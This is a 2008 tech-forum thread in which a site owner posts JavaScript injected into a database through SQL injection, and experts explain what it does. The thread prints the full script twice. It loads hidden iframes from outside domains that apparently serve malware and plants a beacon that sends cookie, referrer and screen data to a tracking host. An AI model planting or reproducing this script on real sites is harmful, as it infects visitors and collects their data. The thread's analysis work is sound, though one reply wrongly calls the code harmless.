Solved

sql injection js script, can someone tell me what this is doing?

Posted on 2008-06-09
3
920 Views
Last Modified: 2008-06-10
Our SQL Server DB was infected with some sort of SQL injection - I downloaded th .js and it is as follows:

document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");

if (navigator.systemLanguage=='zh-cn')
{

}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}



window.onerror=function(){return true};
document.write ('<script>var a3327tf="51la";var a3327pu="";var a3327pf="51la";var a3327su=window.location;var a3327sf=document.referrer;var a3327of="";var a3327op="";var a3327ops=1;var a3327ot=1;var a3327d=new Date();var a3327color="";if (navigator.appName=="Netscape"){a3327color=screen.pixelDepth;} else {a3327color=screen.colorDepth;}<\/script><script>a3327tf=top.document.referrer;<\/script><script>a3327pu =window.parent.location;<\/script><script>a3327pf=window.parent.document.referrer;<\/script><script>a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3327ops=(a3327ops==null)?1: (parseInt(unescape((a3327ops)[2]))+1);var a3327oe =new Date();a3327oe.setTime(a3327oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3327ops+ ";path=/;expires="+a3327oe.toGMTString();a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3327ot==null){a3327ot=1;}else{a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3327ot+";path=/;expires="+a3327oe.toGMTString();<\/script><script>a3327of=a3327sf;if(a3327pf!=="51la"){a3327of=a3327pf;}if(a3327tf!=="51la"){a3327of=a3327tf;}a3327op=a3327pu;try{lainframe}catch(e){a3327op=a3327su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');<\/script>');

Could someone tell me exactly what this is doing?

Thanks in advance.
0
Comment
Question by:samic400
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
3 Comments
 
LVL 6

Expert Comment

by:ysfx
ID: 21744909
Looks like code that sites use to track traffic from a different domain. My guess that this an attempt to circumvent sites that publish user inputs like blogs and feedbacks.
0
 
LVL 3

Accepted Solution

by:
NizzeK earned 500 total points
ID: 21748375
You are not alone with this problem:
http://www.daniweb.com/forums/post614041.html
This is a Chinese attempt to gather information for malicious use.
See: http://www.sudosecure.net/archives/83

The code checks you pages and creates cookies (AJSTAT_ok_pages/AJSTAT_ok_times) with time stamp and availability information. Then it is printed in disguise of a utility, sending the collected information and identity to the data collector at web.51.la.
The code itself is not harmful, but it could reveal something unwanted.
I have reformatted the code to see the structure easier.

Best regards
Nils


document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");
 
if (navigator.systemLanguage=='zh-cn')
{
 
}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}
 
window.onerror=function(){return true};
document.write ('
	<script>
		var a3327tf="51la";
		var a3327pu="";
		var a3327pf="51la";
		var a3327su=window.location;
		var a3327sf=document.referrer;
		var a3327of="";
		var a3327op="";
		var a3327ops=1;
		var a3327ot=1;
		var a3327d=new Date();
		var a3327color="";
		if (navigator.appName=="Netscape")
			     {a3327color=screen.pixelDepth;} 
			else {a3327color=screen.colorDepth;}
	<\/script>
	<script>
		a3327tf=top.document.referrer;
	<\/script>
	<script>
		a3327pu =window.parent.location;
	<\/script>
	<script>
		a3327pf=window.parent.document.referrer;
	<\/script>
	<script>
		a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));
		a3327ops=(a3327ops==null)?1:(parseInt(unescape((a3327ops)[2]))+1);
		var a3327oe =new Date();
		a3327oe.setTime(a3327oe.getTime()+60*60*1000);
		document.cookie="AJSTAT_ok_pages="+a3327ops+ ";
			path=/;
			expires="+a3327oe.toGMTString();
		a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));
		if (a3327ot==null)
			     {a3327ot=1;}
			else {a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}
		a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);
		document.cookie="AJSTAT_ok_times="+a3327ot+";
			path=/;
			expires="+a3327oe.toGMTString();
	<\/script>
	<script>
		a3327of=a3327sf;
		if (a3327pf!=="51la")
			     {a3327of=a3327pf;}
		if(a3327tf!=="51la")
			     {a3327of=a3327tf;}
		a3327op=a3327pu;
		try{lainframe}catch(e){a3327op=a3327su;}
		document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'
			+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'
			+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');
	<\/script>');

Open in new window

0
 
LVL 3

Expert Comment

by:NizzeK
ID: 21748394
But to start with, it gets page 456.htm, and that one has the malicious 4562.swf, see more:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527?logdate=200808
0

Featured Post

Free Tool: Path Explorer

An intuitive utility to help find the CSS path to UI elements on a webpage. These paths are used frequently in a variety of front-end development and QA automation tasks.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Provide the IDEA of External JS 1 35
Worldmap 1 28
Video Tutorial help 2 37
JS to redirect to prev page 8 18
In Part 1 (http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/A_7849-Hex-Maze.html) we covered the hexagonal maze basics -- how the cells are represented in a JavaScript array and how the maze is displayed.  In this part, we'…
This article discusses the difference between strict equality operator and equality operator in JavaScript. The Need: Because JavaScript performs an implicit type conversion when performing comparisons, we have to take this into account when wri…
The viewer will learn the basics of jQuery, including how to invoke it on a web page. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery.: (CODE)
The viewer will learn the basics of jQuery including how to code hide show and toggles. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery…

740 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question